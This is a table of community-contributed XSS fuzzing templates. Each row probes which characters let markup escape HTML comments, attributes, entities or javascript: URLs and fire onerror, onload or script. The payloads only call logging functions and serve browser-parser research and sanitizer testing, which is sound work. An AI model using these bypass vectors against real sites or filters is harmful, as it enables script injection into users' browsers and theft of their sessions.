| Description | Vector | Created by |
| --- | --- | --- |
| Characters that close a HTML comment 4 | `<!-- --*chr*> <img src=xxx:x onerror=log(*num*)> -->` | @irsdl |
| Characters allowed between event handlers and equal sign | `<img src="about:blank" onerror*chr*=logChr(*num*)>` | @peksa |
| HTML input image tag attributes that run JavaScript | `<input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank">` | @peksa |
| HTML input tag attributes that run JavaScript | `<input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text">` | @peksa |
| Characters that escape html input tag | `<input value="" *chr*<script>logChr(*num*)</script> foo="" type="text">` | @peksa |
| Characters that close a HTML comment 0021 | `<!--*chr*><img src=xxx:x onerror=log(*num*)> -->` | @matttiko |
| char after lt and before still valid html | `<*chr*,script>logChr(*num*);</script>` | @p_laguna |
| Characters that can be used to terminate entities in an href | `<a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a>` | @tifkin_ |
| Characters allowed between and in HTML entities in style attribute | `<div style="x:expression(l&*chr*#x6F;gChr(*num*))">` | @tifkin_ |
| Test iOS html5 | `<audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio>` | @kinmenhacker |
| test for progress | `<progress value="*num*" max="*num*"></progress>` | @kinmenhacker |
| Characters allowed after domain | `<a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a>` | @avlidienbrunn |
| Characters allowed before http | `<a href="http://*chr*google.com" id="fuzzelement*num*">test</a>` | @avlidienbrunn |
| Characters allowed in between dashes to end html comments | `<!-- -*chr*-> <script>logChr(*num*)</script> -->` | @JohnathanKuskos |
| char after lt still valid html | `<*chr*a href=x onerror=logChr(*num*)>` | @ethicalhack3r |
| characters allowed in html entities | `<a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a>` | @insertScript |
| Entities allowed with no semi colon | `htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){};` | @garethheyes |
| HTML Entity in between and | `<img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)">` | @MisterJyu |
| Characters allowed before slashes no protocol | `<a href="*chr*//google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed inside slashes no protocol | `<a href="/*chr*/google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed instead of slash 2 | `<a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed instead of slash | `<a href="http:*chr*google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed after slash | `<a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed inside http | `<a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters transformed in expando attributes | `<div id="fuzzelement*num*" expando*chr*="123">test</div>` | @garethheyes |
| Expandos attributes characters removed | `<div id="fuzzelement*num*" expando*chr*=123>test</div>` | @garethheyes |
| Characters allowed instead of forward slash in url | `<a href="*chr**chr*google.com" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed instead of colon in js url | `<a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a>` | @garethheyes |
| Tags that have the onload event | `<*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*>` | @garethheyes |
| html dataentities before event handler | `<img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //">` | @testacc40590139 |
| Break out of HTML element from single quoted attribute | `<img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'>` | @peksa |
| Escaped characters that break out of single quote HTML attribute | `<img src='xx:x\*chr* onerror="logChr(*num*)">'>` | @peksa |
| Characters that escape single quoted HTML attributes | `<img src='xx:x*chr* onerror="logChr(*num*)">'>` | @peksa |
| Characters syntactically equivalent to double quote in HTML attributes | `` `"'><img src="#*chr* onerror=log(*num*)> `` | @p_laguna |
| Characters that break out of script variables | `<script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script>` | @garethheyes |
| Characters that close a HTML comment 3 | `--><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> -->` | @DOMXss |
| Characters that trigger a new attr after new line | `<img src=1 title= x:xx*chr*/onerror=logChr(*num*)>` | @garethheyes |
| Characters ignored in html event handler name | `<img src=x on*chr*Error="javascript:log(*num*)"/>` | @mhswende |
| Characters allowed after ampersand in named character references | `<a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a>` | @_cweb |
| Characters ending HTML closing tags (HTML4) | `<style></style*chr*<img src="about:blank" onerror=log(*num*)//></style>` | @0x6D6172696F |
| Tags and events that execute javascript 2 | `<*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*>` | @garethheyes |
| Tags and events that execute javascript | `<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>` | @garethheyes |
| Tags that execute onerror | `<*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*>` | @garethheyes |
| Characters to separate class names in class attributes | `<div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script>` | @0x6D6172696F |
| Characters that close a HTML comment 002 | `<!--*chr*<img src=xxx:x onerror=log(*num*)> -->` | @0x6D6172696F |
| Characters that close HTML tags | `<script>log(*num*)</script*chr*` | @0x6D6172696F |
| Characters allowed after script | `<script*chr*>log(*num*)</script>` | @garethheyes |
| Single character breaking innerHTML copy | `<div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div>` | @thewildcat |
| Entity character breaking innerHTML copy | `<div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div>` | @thewildcat |
| Characters syntactically equivalent to single quote in HTML attributes | `` `"'><img src='#*chr* onerror=log(*num*)> `` | @_cweb |
| Characters breaking innerHTML copy | `<div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div>` | @thewildcat |
| Characters before img | `` "'`><*chr*img src=xxx:x onerror=log(*num*)> `` | @garethheyes |
| Characters before script | `` '`"><*chr*script>log(*num*)</script> `` | @garethheyes |
| Characters in between protocol in js url | `<a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed after attribute name | `` `"'><img src=xxx:x onerror*chr*=log(*num*)> `` | @garethheyes |
| Characters allowed before protocol in js url | `<a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters allowed before colon in js url | `<a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a>` | @garethheyes |
| Characters that close a HTML comment | `--><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> -->` | @garethheyes |
| Characters allowed before attribute name | `` `"'><img src=xxx:x *chr*onerror=log(*num*)> `` | @garethheyes |